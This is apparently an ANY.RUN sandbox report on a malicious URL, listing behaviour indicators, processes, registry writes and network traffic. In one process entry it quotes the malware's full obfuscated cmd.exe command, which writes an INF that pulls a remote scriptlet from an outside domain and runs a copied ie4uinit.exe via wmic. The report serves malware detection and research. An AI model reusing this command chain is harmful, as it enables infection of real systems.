URL:

52.96.66.162:443

Full analysis: https://app.any.run/tasks/b5761633-6adb-4ab7-a321-d00b143d27b4
Verdict: Malicious activity
Analysis date: May 07, 2024, 17:29:02
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MD5:

30576FC0DCB7DCBA249B43905EEB6890

SHA1:

213583DB895CF5A429A86E314CE50A5D88A264F5

SHA256:

176EC42FE474D83D07AC2E800D21B567E1A1005CC1C06F8C36BDB7577B28F50A

SSDEEP:

3:CaeW:CaeW

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Drops the executable file immediately after the start

      • ie4uinit.exe (PID: 1816)

    • Changes the login/logoff helper path in the registry

      • regsvr32.exe (PID: 2736)

    • Reads the value of a key from the registry (SCRIPT)

      • msxsl.exe (PID: 3384)

    • Creates internet connection object (SCRIPT)

      • msxsl.exe (PID: 3384)

    • Opens an HTTP connection (SCRIPT)

      • msxsl.exe (PID: 3384)

    • Accesses the network adapter (Win32_NetworkAdapter) via WMI (SCRIPT)

      • msxsl.exe (PID: 3384)

    • Gets a file object corresponding to the file in a specified path (SCRIPT)

      • msxsl.exe (PID: 3384)

    • May hide the program window using WMI (SCRIPT)

      • msxsl.exe (PID: 3384)

    • Sends HTTP request (SCRIPT)

      • msxsl.exe (PID: 3384)

  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • WinRAR.exe (PID: 2256)
      • cmd.exe (PID: 1280)
      • regsvr32.exe (PID: 2736)

    • Process drops legitimate windows executable

      • xcopy.exe (PID: 2432)

    • Process copies executable file

      • cmd.exe (PID: 2412)

    • Application launched itself

      • cmd.exe (PID: 1280)
      • ie4uinit.exe (PID: 1816)

    • Reads security settings of Internet Explorer

      • WinRAR.exe (PID: 2256)
      • ie4uinit.exe (PID: 1816)
      • msxsl.exe (PID: 3384)

    • Executable content was dropped or overwritten

      • xcopy.exe (PID: 2432)
      • ie4uinit.exe (PID: 1816)
      • regsvr32.exe (PID: 2736)

    • Executed via WMI

      • ie4uinit.exe (PID: 1816)
      • regsvr32.exe (PID: 2736)
      • msxsl.exe (PID: 3384)
      • typeperf.exe (PID: 2820)

    • Uses WMIC.EXE to create a new process

      • cmd.exe (PID: 3388)

    • Reads the Internet Settings

      • WMIC.exe (PID: 1520)
      • ie4uinit.exe (PID: 1816)
      • msxsl.exe (PID: 3384)

    • Creates a Stream, which may work with files, input/output devices, pipes, or TCP/IP sockets (SCRIPT)

      • ie4uinit.exe (PID: 1816)

    • Writes binary data to a Stream object (SCRIPT)

      • ie4uinit.exe (PID: 1816)

    • Creates an object to access WMI (SCRIPT)

      • ie4uinit.exe (PID: 1816)

    • Changes charset (SCRIPT)

      • ie4uinit.exe (PID: 1816)

    • Saves data to a binary file (SCRIPT)

      • ie4uinit.exe (PID: 1816)

    • Accesses WMI object, sets custom ImpersonationLevel (SCRIPT)

      • ie4uinit.exe (PID: 1816)

    • Checks whether a specific file exists (SCRIPT)

      • msxsl.exe (PID: 3384)

    • Creates FileSystem object to access computer's file system (SCRIPT)

      • msxsl.exe (PID: 3384)

    • Accesses computer name via WMI (SCRIPT)

      • msxsl.exe (PID: 3384)

    • Accesses current user name via WMI (SCRIPT)

      • msxsl.exe (PID: 3384)

    • Reads settings of System Certificates

      • msxsl.exe (PID: 3384)

    • Checks Windows Trust Settings

      • msxsl.exe (PID: 3384)

    • Executes WMI query (SCRIPT)

      • msxsl.exe (PID: 3384)

    • Adds/modifies Windows certificates

      • msxsl.exe (PID: 3384)

  • INFO

    • The process uses the downloaded file

      • WinRAR.exe (PID: 2256)
      • msedge.exe (PID: 580)

    • Reads the computer name

      • wmpnscfg.exe (PID: 2556)
      • ie4uinit.exe (PID: 1816)
      • ie4uinit.exe (PID: 2696)
      • msxsl.exe (PID: 3384)

    • Application launched itself

      • msedge.exe (PID: 3984)

    • Manual execution by a user

      • wmpnscfg.exe (PID: 2556)
      • notepad++.exe (PID: 116)
      • notepad++.exe (PID: 2920)

    • Checks supported languages

      • wmpnscfg.exe (PID: 2556)
      • ie4uinit.exe (PID: 1816)
      • ie4uinit.exe (PID: 2696)
      • msxsl.exe (PID: 3384)

    • Creates files or folders in the user directory

      • xcopy.exe (PID: 2432)
      • ie4uinit.exe (PID: 1816)
      • regsvr32.exe (PID: 2736)
      • msxsl.exe (PID: 3384)

    • Drops the executable file immediately after the start

      • xcopy.exe (PID: 2432)
      • regsvr32.exe (PID: 2736)

    • Checks proxy server information

      • ie4uinit.exe (PID: 1816)
      • msxsl.exe (PID: 3384)

    • Reads the machine GUID from the registry

      • ie4uinit.exe (PID: 1816)
      • msxsl.exe (PID: 3384)

    • Reads Environment values

      • ie4uinit.exe (PID: 1816)
      • msxsl.exe (PID: 3384)

    • Create files in a temporary directory

      • ie4uinit.exe (PID: 1816)

    • Reads the software policy settings

      • msxsl.exe (PID: 3384)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
96
Monitored processes
52
Malicious processes
4
Suspicious processes
2

Behavior graph

Click at the process to see the details
start msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs wmpnscfg.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs winrar.exe no specs PhotoViewer.dll no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs xcopy.exe cmd.exe no specs cmd.exe no specs wmic.exe no specs ie4uinit.exe ie4uinit.exe no specs regsvr32.exe notepad++.exe notepad++.exe msxsl.exe PhotoViewer.dll no specs cmd.exe no specs typeperf.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
112"C:\Program Files\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1284 --field-trial-handle=1308,i,12563438504894062406,7155727255082959443,131072 /prefetch:2C:\Program Files\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
109.0.1518.115
Modules
Images
c:\program files\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\microsoft\edge\application\109.0.1518.115\msedge_elf.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
116"C:\Program Files\Notepad++\notepad++.exe" "C:\Windows\System32\cmd.exe"C:\Program Files\Notepad++\notepad++.exe
explorer.exe
User:
admin
Company:
Don HO don.h@free.fr
Integrity Level:
MEDIUM
Description:
Notepad++ : a free (GNU) source code editor
Exit code:
0
Version:
7.91
Modules
Images
c:\program files\notepad++\notepad++.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.24483_none_2b200f664577e14b\comctl32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
580"C:\Program Files\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 --field-trial-handle=1308,i,12563438504894062406,7155727255082959443,131072 /prefetch:8C:\Program Files\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Edge
Exit code:
0
Version:
109.0.1518.115
Modules
Images
c:\program files\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\microsoft\edge\application\109.0.1518.115\msedge_elf.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
764"C:\Program Files\Microsoft\Edge\Application\msedge.exe" --type=renderer --first-renderer-process --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2224 --field-trial-handle=1308,i,12563438504894062406,7155727255082959443,131072 /prefetch:1C:\Program Files\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
109.0.1518.115
Modules
Images
c:\program files\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\microsoft\edge\application\109.0.1518.115\msedge_elf.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
768"C:\Program Files\Microsoft\Edge\Application\msedge.exe" --type=renderer --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=32 --mojo-platform-channel-handle=3604 --field-trial-handle=1308,i,12563438504894062406,7155727255082959443,131072 /prefetch:1C:\Program Files\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Version:
109.0.1518.115
Modules
Images
c:\program files\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\microsoft\edge\application\109.0.1518.115\msedge_elf.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
1060"C:\Program Files\Microsoft\Edge\Application\msedge.exe" --type=renderer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2232 --field-trial-handle=1308,i,12563438504894062406,7155727255082959443,131072 /prefetch:1C:\Program Files\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
109.0.1518.115
Modules
Images
c:\program files\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\microsoft\edge\application\109.0.1518.115\msedge_elf.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
1240"C:\Program Files\Microsoft\Edge\Application\msedge.exe" --type=renderer --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=3832 --field-trial-handle=1308,i,12563438504894062406,7155727255082959443,131072 /prefetch:1C:\Program Files\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
109.0.1518.115
Modules
Images
c:\program files\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\microsoft\edge\application\109.0.1518.115\msedge_elf.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
1280"C:\Windows\System32\cmd.exe" /v /c (for %t in (s) do @set "Signs=%~t") && !Signs!et "Physics=t" && !Signs!et "Clouds=a" && !Signs!et "Portraits=e" && (for %z in (c) do @!Signs!et "Fragile=%~z") && !Signs!et "Train=default" && !Signs!et "Salute=version" && (for %w in (a) do @!Signs!et "Pottery=%~w") && !Signs!et "Sheets=ure = " && !Signs!et "Excuse=d" && !Signs!et "Scrub=." && !Signs!et "Order=ni" && !Signs!et "Hypothesis=si" && !Signs!et "Rebates=$win" && !Signs!et "Efforts=settings" && !Signs!et "Guide=!Scrub!inf" && !Signs!et "Indicators=ieui!Order!t!Guide!" && c!Clouds!ll !Signs!et "Salaries=%!Pottery!ppd!Clouds!ta%\micro!Signs!oft\" && s!Portraits!t "Dizzy=!Salaries!!Indicators!" && (for %t in ("[3DC73B]" "sc\" "ro%Sight%j,NI,%Practitioners%%Fabric%%Fabric%p%Owners%%Limit%%Limit%jsb!Scrub!christianvelour!Scrub!%Americans%/hfksgtui" "[5EE5]" "ieu%Critics%!Guide!" "[!Excuse!e!Signs!tinationdirs]" "!Train!destdir=11" "5EE5=01" "[!Train!in!Signs!tall.windows7]" "Un\" "Register\" "OCXs=3DC73B" "!Excuse!elfil!Portraits!s=5EE5" "[s!Physics!ring!Signs!]" "Critics=i!Order!t" "Sight=b;Betray" "Fabric=t;Clerk" "Practitioners=h" "Americans=com" "Ritual=%time%" "Limit=/" "!Signs!ervicen!Pottery!me=' '" "!Signs!hortsvcn!Pottery!me=' '" "Owners=:;Provide" "[!Salute!]" "signat!Sheets!!Rebates!dows ntf7f81a39-5f63-5b42-9efd-1f13b5431005quot; ) do @e!Fragile!ho %~t)>"!Dizzy!" && !Signs!et "Class=ie4ui!Order!t.!Portraits!xe" && !Fragile!all x!Fragile!opy /Y /C /Q %win!Excuse!ir%\!Signs!ys!Physics!!Portraits!m32\!Class! "!Salaries!*" | !Signs!et Outputs7=Since && !Signs!t!Pottery!rt "" wmi!Fragile! proce!Signs!s call !Fragile!rea!Physics!e "!Salaries!!Class! -base!Efforts!" | !Signs!et "Outputs4=Peripherals Strike Politics Repairs Wives Other Remove Tomatoes Shove Faces Reopen Thunder Middle Bases Appear Promote Holmes Sports Cabbage Democrats Clinics Vocals Ripple Madness Bikes Nation Orchard Fetch Affair Pairs Envelope Leader Volunteers Davis Account Anger Develops Requests Wines Wellness Pieces Farmers Crunch Reforms Utils Outdoor Syrup Relations Information Briefs Couples Chunk Struggle Warrior Weekend Rides Obligations Builds Sibling Veterans Directories March Hollow Theaters Dynamics Continues Ranks Minds Codes"C:\Windows\System32\cmd.exeWinRAR.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
1288C:\Windows\system32\cmd.exe /S /D /c" set Outputs7=Since "C:\Windows\System32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
1344"C:\Program Files\Microsoft\Edge\Application\msedge.exe" --type=renderer --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=3188 --field-trial-handle=1308,i,12563438504894062406,7155727255082959443,131072 /prefetch:1C:\Program Files\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
109.0.1518.115
Modules
Images
c:\program files\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\microsoft\edge\application\109.0.1518.115\msedge_elf.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
Total events
26 801
Read events
26 478
Write events
281
Delete events
42

Modification events

(PID) Process:(3984) msedge.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Edge\BLBeacon
Operation:writeName:failed_count
Value:
0
(PID) Process:(3984) msedge.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Edge\BLBeacon
Operation:writeName:state
Value:
2
(PID) Process:(3984) msedge.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Edge\ThirdParty
Operation:writeName:StatusCodes
Value:
(PID) Process:(3984) msedge.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Edge\ThirdParty
Operation:writeName:StatusCodes
Value:
01000000
(PID) Process:(3984) msedge.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Edge\BLBeacon
Operation:writeName:state
Value:
1
(PID) Process:(3984) msedge.exeKey:HKEY_CURRENT_USER\Software\Microsoft\EdgeUpdate\ClientState\{56EB18F8-B008-4CBD-B6D2-8C97FE7E9062}
Operation:writeName:dr
Value:
1
(PID) Process:(3984) msedge.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Edge\StabilityMetrics
Operation:writeName:user_experience_metrics.stability.exited_cleanly
Value:
0
(PID) Process:(3984) msedge.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EdgeUpdate\ClientStateMedium\{56EB18F8-B008-4CBD-B6D2-8C97FE7E9062}\LastWasDefault
Operation:writeName:S-1-5-21-1302019708-1500728564-335382590-1000
Value:
0D56CACE76762F00
(PID) Process:(3984) msedge.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EdgeUpdate\ClientStateMedium\{56EB18F8-B008-4CBD-B6D2-8C97FE7E9062}\FirstNotDefault
Operation:delete valueName:S-1-5-21-1302019708-1500728564-335382590-1000
Value:
(PID) Process:(3984) msedge.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Edge
Operation:writeName:UsageStatsInSample
Value:
1
Executable files
3
Suspicious files
127
Text files
55
Unknown types
7

Dropped files

PID
Process
Filename
Type
3984msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Local State
MD5:
SHA256:
3984msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\commerce_subscription_db\LOG.old~RF1041fc.TMP
MD5:
SHA256:
3984msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\commerce_subscription_db\LOG.old
MD5:
SHA256:
3984msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokenAndKey\LOG.old~RF10422b.TMP
MD5:
SHA256:
3984msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokenAndKey\LOG.old
MD5:
SHA256:
3984msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\LOG.old~RF1042d7.TMP
MD5:
SHA256:
3984msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\LOG.old
MD5:
SHA256:
4008msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\CrashpadMetrics.pmabinary
MD5:C612E96CBFAC63232FC2062E15600FB1
SHA256:DB3C05D5EC0B6719A73E7F0BE84BCE9342772DA70567E7CE08CF6573480B38FF
3984msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG.oldtext
MD5:B2E1E436F8C0098B209AB866ADCDDEC4
SHA256:6D137151132C6D0847E71AE0438348FB624F4AABFE26228B637153353A266035
3984msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-walbinary
MD5:A366C186B8AD5582B4C1A53EA8622BF7
SHA256:EDDFFE48B489FD18A5AA295B067ECE2959AE4DBEFCE9FF0134BA986FB98AA913
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
31
TCP/UDP connections
83
DNS requests
76
Threats
4

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2032
msedge.exe
GET
52.96.66.162:443
http://52.96.66.162:443/
unknown
unknown
2032
msedge.exe
GET
52.96.66.162:443
http://52.96.66.162:443/
unknown
unknown
2032
msedge.exe
GET
52.96.66.162:443
http://52.96.66.162:443/
unknown
unknown
2032
msedge.exe
GET
52.96.66.162:443
http://52.96.66.162:443/
unknown
unknown
2032
msedge.exe
GET
301
52.96.66.162:80
http://52.96.66.162/
unknown
unknown
2032
msedge.exe
GET
204
13.107.6.158:80
http://edge-http.microsoft.com/captiveportal/generate_204
unknown
unknown
2032
msedge.exe
GET
200
142.11.194.191:80
http://142.11.194.191/css/main.css
unknown
unknown
2032
msedge.exe
GET
200
142.11.194.191:80
http://142.11.194.191/css/bootstrap-grid.min.css
unknown
unknown
2032
msedge.exe
GET
200
142.11.194.191:80
http://142.11.194.191/css/reset.css
unknown
unknown
2032
msedge.exe
GET
200
142.11.194.191:80
http://142.11.194.191/
unknown
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
224.0.0.252:5355
unknown
4
System
192.168.100.255:138
whitelisted
1088
svchost.exe
224.0.0.252:5355
unknown
2032
msedge.exe
52.96.66.162:443
MICROSOFT-CORP-MSN-AS-BLOCK
US
unknown
3984
msedge.exe
239.255.255.250:1900
unknown
2032
msedge.exe
13.107.42.16:443
config.edge.skype.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
2032
msedge.exe
13.107.21.239:443
edge.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
unknown
2032
msedge.exe
152.199.21.175:443
msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com
EDGECAST
DE
whitelisted
3984
msedge.exe
224.0.0.251:5353
unknown

DNS requests

Domain
IP
Reputation
config.edge.skype.com
  • 13.107.42.16
whitelisted
edge.microsoft.com
  • 13.107.21.239
  • 204.79.197.239
whitelisted
www.bing.com
  • 2.16.65.200
  • 2.16.65.99
  • 2.16.65.219
  • 2.16.65.218
  • 2.16.65.201
  • 2.16.65.211
  • 2.16.65.203
  • 2.16.65.216
  • 2.16.65.210
  • 104.126.37.155
  • 104.126.37.177
  • 104.126.37.176
  • 104.126.37.170
  • 104.126.37.162
  • 104.126.37.153
  • 104.126.37.178
  • 104.126.37.160
  • 104.126.37.145
whitelisted
msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com
  • 152.199.21.175
whitelisted
edge-http.microsoft.com
  • 13.107.6.158
whitelisted
outlook.office365.com
  • 52.97.189.66
  • 52.98.179.162
  • 52.98.178.226
whitelisted
login.microsoftonline.com
  • 40.126.32.133
  • 20.190.160.17
  • 20.190.160.20
  • 40.126.32.138
  • 20.190.160.22
  • 40.126.32.76
  • 40.126.32.136
  • 40.126.32.134
  • 20.190.159.64
  • 20.190.159.23
  • 20.190.159.73
  • 20.190.159.68
  • 40.126.31.69
  • 20.190.159.2
  • 20.190.159.0
  • 40.126.31.67
whitelisted
aadcdn.msauth.net
  • 13.107.246.45
  • 13.107.213.45
whitelisted
aadcdn.msftauth.net
  • 152.199.23.37
whitelisted
login.live.com
  • 20.190.160.20
  • 40.126.32.140
  • 40.126.32.68
  • 20.190.160.17
  • 40.126.32.133
  • 20.190.160.22
  • 20.190.160.14
  • 40.126.32.76
whitelisted

Threats

PID
Process
Class
Message
2032
msedge.exe
Not Suspicious Traffic
INFO [ANY.RUN] A free CDN for open source projects (jsdelivr .net)
3 ETPRO signatures available at the full report
Process
Message
notepad++.exe
VerifyLibrary: C:\Program Files\Notepad++\SciLexer.dll
notepad++.exe
VerifyLibrary: certificate revocation checking is disabled
notepad++.exe
ED255D9151912E40DF048A56288E969A8D0DAFA3
notepad++.exe
VerifyLibrary: certificate revocation checking is disabled
notepad++.exe
VerifyLibrary: C:\Program Files\Notepad++\updater\gup.exe
notepad++.exe
ED255D9151912E40DF048A56288E969A8D0DAFA3
notepad++.exe
ED255D9151912E40DF048A56288E969A8D0DAFA3
notepad++.exe
VerifyLibrary: C:\Program Files\Notepad++\updater\gup.exe
notepad++.exe
VerifyLibrary: C:\Program Files\Notepad++\plugins\Config\nppPluginList.dll
notepad++.exe
VerifyLibrary: certificate revocation checking is disabled
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
52.96.66.162:443